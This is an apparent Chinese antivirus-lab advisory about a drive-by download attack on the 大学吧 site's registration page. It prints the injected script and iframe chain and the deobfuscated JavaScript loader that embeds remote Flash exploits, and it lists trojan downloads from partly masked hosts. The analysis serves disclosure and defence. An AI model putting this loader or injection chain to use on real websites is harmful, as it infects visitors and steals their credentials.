大学吧网站挂马事件

5月29日，安天实验室发现，近期利用Flash插件挂马事件较多，提请广大用户注意。
以下以大学吧网站为例。

　　大学吧网站挂注册页面(http://www.haydao.com/member/register.php)被黑客植
入病毒，用户如果访问该网站，系统就会自动从恶意网站上下载并运行恶意程序。被感染
病毒的用户系统可能被远程控制，盗取用户敏感信息。甚至导致死机。

　　该网站问题代码：

　　　
　　<script type="text/javascript" src="/include/js/common.js">
　　</script>
　　http://www.ha****.com/include/js/common.js问题框架代码：

　

　　代码解密后得出的地址：document.writeln("<script src=
　　http://www.t****.com/include/haed.js></script>")；
　　http://www.t****.com/include/haed.js问题框架代码：

　
　
　　<iframe src=http://www.fir****.cn/zi.htm?006 width=100 height=0>
　　</iframe>
　　http://www.fir****.cn/zi.htm?006问题框架代码：

　

　　<iframe width=100 height=100 src=ad/ad.htm></iframe>
　　http://www.fire122.cn/ad/ad.htm 网马代码：

　

　　该加密网马解密后可知利用了一个最新的Adobe Flash Player SWF文件漏洞。
　　ad.htm解密后网马代码：

　　window.onerror=function(){return true;}
　　function init(){window.status="";}window.onload = init;
　　if(document.cookie.indexOf("play=")==-1){
　　var expires=new Date();
　　expires.setTime(expires.getTime()+24*60*60*1000);
　　document.cookie="play=Yes;path=/;expires="+expires.toGMTString();
　　if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
　　{document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-
　　444553540000"codebase="http://download.macromedia.com/pub/
　　shockwave/cabs/flash/swflash.cab#version=4,0,19,0" width="0"
　　height="0" align="middle">');
　　document.write('<param name="allowScriptAccess" value="always"/>');
　　document.write('<param name="movie" value="http://www.psp 1111 .cn
　　/flash/versionie.swf"/>');
　　document.write('<param name="quality" value="high"/>');
　　document.write('<param name="bgcolor" value="#ffffff"/>');
　　document.write('<embed src="http://www.psp 1111 .cn/
　　flash/versionie.swf"/>');
　　document.write('</object>');
　　}else
　　{document.write("<EMBED src=http://www.psp 1111 .cn/
　　flash/versionff.swf width=0 height=0>");}}
　　
　　该漏洞针对Adobe Flash Player ActiveX版本号为9.0.124.0以前的
　　所有版本有效。

　　　
　
　　例如：版本：9.0.115.0也会中这种网马。
　　建议用户尽快更新自己的Adobe Flash Player ActiveX或者到Adobe官方网站
　　下载升级补丁：http://www.adobe.com/go/getflash
　　http://www.fir****.cn/ad/vip1.htm 网马代码：

　

　　该加密网马解密后可知利用以下漏洞来传播：
　　MS06014漏洞 (clsid:BD96C556-65A3-11D0-983A-00C04FC29E36)
　　RealPlayer播放器IERPCtl.IERPCtl.1漏洞
　　联众世界游戏大厅所安装的GLCHAT.GLChatCtrl.1 ActiveX控件漏洞

　　当用户访问http://www.haydao.com/member/register.php时，系统会自动
　　下载以下病毒文件：

　　http://www.pp****.cn/e.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.ajyu)

　　http://60.190.114.**/a1.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.akay)

　　http://60.190.114.**/a2.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.ajss)

　　http://60.190.114.**/a3.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.ajsw)

　　http://60.190.114.**/a4.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.ajtt)

　　http://60.190.114.**/a5.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.ajto)

　　http://60.190.114.**/a6.exe
　　病毒名：(Trojan-PSW.Win32.QQPass.cbj)

　　http://60.190.114.**/a7.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.ajtx)

　　http://60.190.114.**/a8.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.ajnn)

　　http://60.190.114.**/a9.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aknn)

　　http://60.190.114.**/a10.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.ajtr)

　　http://60.190.114.**/a11.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.ajti)

　　http://60.190.114.**/a12.exe
　　病毒名：(Trojan-Dropper.Win32.Agent.sbh)

　　http://60.190.114.**/a13.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.ajsz)

　　http://60.190.114.**/a14.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.ajtn)

　　http://60.190.114.**/a15.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.akka)

　　http://60.190.114.**/a16.exe
　　病毒名：(Trojan-PSW.Win32.Lmir.bvh)

　　http://60.190.114.**/a17.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.akau)

　　http://60.190.114.**/a18.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.ajsr)

　　http://60.190.114.**/a19.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.ajth)

　　http://60.190.114.**/a20.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.ajtq)

　　http://60.190.114.**/a21.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aeoa)

　　http://60.190.114.**/a22.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aklk)

　　http://60.190.114.**/a23.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.ajyj)

　　http://60.190.114.**/a24.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.ajsp)

　　http://60.190.114.**/a25.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.ajta)

　　http://60.190.114.**/a26.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.akjn)

　　http://60.190.114.**/a27.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.ajyu)

　　http://60.190.114.**/a28.exe
　　病毒名：(Trojan.Win32.StartPage.avr)

　　http://60.190.114.**/a29.exe
　　病毒名：(Trojan.Win32.Agent.lww)

　　以上病毒文件为下载者木马和游戏盗号木马，自动运行后将会，盗取用户敏感
信息，甚至导致死机。由于下载数量太多，这里不一一分析。

www.newjian.com